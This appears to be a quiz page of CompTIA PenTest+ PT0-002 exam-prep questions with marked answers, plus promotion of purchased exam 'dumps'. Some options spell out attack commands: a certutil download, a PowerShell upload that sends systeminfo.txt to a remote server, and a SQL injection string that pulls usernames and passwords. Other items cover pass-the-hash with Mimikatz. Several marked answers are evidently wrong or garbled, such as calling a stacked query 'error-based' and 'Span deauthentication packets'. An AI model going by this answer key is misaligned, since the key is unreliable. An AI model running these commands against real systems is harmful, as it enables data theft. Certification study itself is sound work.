CompTIA PenTest+ PT0-002 Exam Preparation
48 Questions
3 Views

Choose a study mode

Play Quiz
Study Flashcards
Spaced Repetition
Chat to lesson

Podcast

Play an AI-generated podcast conversation about this lesson

Questions and Answers

Which vulnerability allows a tester to obtain credentials by querying a cloud provider's metadata?

  • Server-side request forgery (correct)
  • Local file inclusion
  • Remote file inclusion
  • Cross-site request forgery
  • What command can a penetration tester use to download a file from a remote server to assist in exploring service permissions?

  • wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe
  • schtasks /query /fo LIST /v | find /I “Next Run Time:”
  • powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/upload.php’, ‘systeminfo.txt’)
  • certutil –urlcache –split –f http://192.168.2.124/windows-binaries/accesschk64.exe (correct)
  • Which command would a penetration tester use to perform a ping scan on a subnet?

  • nmap -sn 10.12.1.0/24 (correct)
  • nmap -sV -A 10.12.1.0/24
  • nmap -Pn 10.12.1.0/24
  • nmap -sT -p- 10.12.1.0/24
  • What is the most effective recommendation to secure a wireless network after an unauthorized access event using Aircrack-ng?

    <p>Changing to Wi-Fi equipment that supports strong encryption</p> Signup and view all the answers

    Which benefit does the command 'schtasks /query /fo LIST /v | find /I “Next Run Time:”' provide when exploring service permissions?

    <p>Lists all scheduled tasks and their next run times</p> Signup and view all the answers

    What aspect of testing does server-side request forgery highlight when accessing cloud provider metadata?

    <p>Obtaining sensitive environment data</p> Signup and view all the answers

    What is the best method for a penetration tester to pivot and gain additional access to a network when faced with restrictive ACLs on a wireless subnet?

    <p>Span deauthentication packets to the wireless clients.</p> Signup and view all the answers

    Which approach is NOT recommended to enhance wireless security?

    <p>Using WEP encryption</p> Signup and view all the answers

    What likely caused all 65,535 ports to be reported as filtered during a second Nmap scan?

    <p>A firewall or IPS blocked the scan.</p> Signup and view all the answers

    Which tool provides an exploitation suite with payload modules covering the broadest range of target system types?

    <p>Metasploit</p> Signup and view all the answers

    What impact does using 'nmap -sV -A 10.12.1.0/24' have when assessing a network?

    <p>It provides versioning and OS detection for services running on hosts</p> Signup and view all the answers

    Which tool combination would be most effective for preparing an attack after discovering a PHP script in a vulnerable state?

    <p>Burp Suite and DIRB</p> Signup and view all the answers

    What does the -F option in an Nmap scan refer to?

    <p>Fast scan that checks only common ports.</p> Signup and view all the answers

    If a penetration tester finds a PHP script in an unprotected internal repository, what should be the primary concern?

    <p>The script may contain security vulnerabilities.</p> Signup and view all the answers

    Which of the following responses is NOT a potential countermeasure a firewall might perform during a network scan?

    <p>Automatically updating signature definitions.</p> Signup and view all the answers

    In the context of penetration testing, what is an 'evil twin' attack?

    <p>A technique of impersonating a legitimate access point.</p> Signup and view all the answers

    After discovering a vulnerability and failing to report it, what is the appropriate next step for the company?

    <p>Investigate the penetration tester</p> Signup and view all the answers

    What should a company verify first when it wants to test the security of its hosted data after obtaining permission from a cloud service provider?

    <p>Whether sensitive client data is publicly accessible</p> Signup and view all the answers

    What is an example of a Bluesnarfing attack that a penetration tester could perform?

    <p>Dump the user address book on the device</p> Signup and view all the answers

    Why is it critical for companies to thoroughly investigate after a breach has occurred?

    <p>To determine the cause and prevent future incidents</p> Signup and view all the answers

    Which of the following is NOT a recommended action after notifying a client about a data breach?

    <p>Increase marketing efforts to regain client trust</p> Signup and view all the answers

    What outcomes can a poorly executed penetration test lead to?

    <p>Unauthorized access to sensitive data</p> Signup and view all the answers

    What action should be prioritized to ensure client data is protected in a cloud environment?

    <p>Strict access controls</p> Signup and view all the answers

    What is the primary goal of conducting a vulnerability scan?

    <p>To identify potential security weaknesses</p> Signup and view all the answers

    Which of the following actions would be considered unethical according to the SOW? (Select two)

    <p>Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team</p> Signup and view all the answers

    What is the most likely reason for receiving TCP resets during the assessment of web servers?

    <p>The web server is using a Web Application Firewall (WAF)</p> Signup and view all the answers

    What should a penetration tester do with client findings after an engagement according to the SOW?

    <p>Dispose of findings by erasing them in a secure manner</p> Signup and view all the answers

    Which behavior aligns with ethical standards when working with a client’s confidential information?

    <p>Encrypting findings before delivering them to the client</p> Signup and view all the answers

    In the context of the SOW, which of the following actions could be potentially harmful to the client's security?

    <p>Disregarding security protocols of the engagement</p> Signup and view all the answers

    When a WAF resets a TCP connection, what is it likely responding to?

    <p>Malformed packets or suspected attacks</p> Signup and view all the answers

    What is a primary responsibility of a penetration tester concerning client confidentiality?

    <p>Maintaining confidentiality of sensitive information regarding the client</p> Signup and view all the answers

    Which practice could lead to ethical violations in penetration testing?

    <p>Failing to report critical vulnerabilities to the client</p> Signup and view all the answers

    Which tool is the penetration tester MOST likely to use for performing a vulnerability scan against a web server?

    <p>Nikto</p> Signup and view all the answers

    What type of SQL injection attack is indicated by the input '1;SELECT Username, Password FROM Users;'?

    <p>Error-based</p> Signup and view all the answers

    Based on Nmap scan results, which operating system is the target MOST likely running if the scan points to Windows features?

    <p>Windows Server</p> Signup and view all the answers

    Which Nmap command correctly scans for UDP services SNMP, NetBIOS, and DNS?

    <p>nmap –vv sUV –p 53,137-139,161-162 10.10.1.20/24 –oA udpscan</p> Signup and view all the answers

    What should a company do NEXT if security alarms are triggered during a penetration test?

    <p>Contact law enforcement.</p> Signup and view all the answers

    Which scenario BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

    <p>The IP address is on the blocklist.</p> Signup and view all the answers

    In which scenario would a penetration tester most likely use Nmap?

    <p>To perform a network discovery.</p> Signup and view all the answers

    Which of the following correctly represents a limitation of penetration testing?

    <p>It can only evaluate known vulnerabilities.</p> Signup and view all the answers

    What is the primary reason for TCP resets from a web server when a WAF is present?

    <p>The WAF is blocking legitimate traffic.</p> Signup and view all the answers

    Which recommendation should a penetration tester make to address the use of vulnerable third-party modules in products?

    <p>Add a dependency checker into the tool chain.</p> Signup and view all the answers

    What change is necessary for fixing the Perl script used to identify vulnerabilities in network switches?

    <p>Remove unnecessary variables and streamline the code.</p> Signup and view all the answers

    Which tool should be used to pass the hash once password hashes are extracted from lsass.exe?

    <p>Mimikatz</p> Signup and view all the answers

    What is the most effective way to ensure the security of API settings before a deployment?

    <p>Implement strict validation protocols.</p> Signup and view all the answers

    What tool is recommended for achieving persistence after passing the hash?

    <p>WMI</p> Signup and view all the answers

    Which option describes a common outcome when a penetration tester uses a dependency checker during the software development process?

    <p>Detecting and addressing known vulnerabilities in libraries.</p> Signup and view all the answers

    What is a critical step to ensure the Perl script runs properly?

    <p>Modifying specific lines to correct initialization.</p> Signup and view all the answers

    Study Notes

    CompTIA PenTest+ PT0-002 Dumps

    • CertLeader provides 100% valid and up-to-date practice questions and answers for the CompTIA PenTest+ certification exam (PT0-002).
    • The dumps contain 253 questions and answers.
    • The website provides links to access the practice materials.
    • The dumps cover the CompTIA PenTest+ certification exam.

    Studying That Suits You

    Use AI to generate personalized quizzes and flashcards to suit your learning preferences.

    Quiz Team

    Related Documents

    PT0-002 Practice Questions PDF

    Description

    Get ready for your CompTIA PenTest+ PT0-002 exam with our comprehensive practice questions and answers. This quiz includes 253 valid and up-to-date questions, designed to help you succeed in your certification goals. Access the best preparatory materials to boost your confidence and performance on exam day.

    More Like This

    TestOut CompTIA A+ Flashcards
    95 questions
    CompTIA A+ Certification Flashcards
    26 questions
    CompTIA PenTest+ Exam Overview
    9 questions
    CompTIA Pentest 3.1 Interview Insights
    39 questions
    Use Quizgecko on...
    Browser
    Browser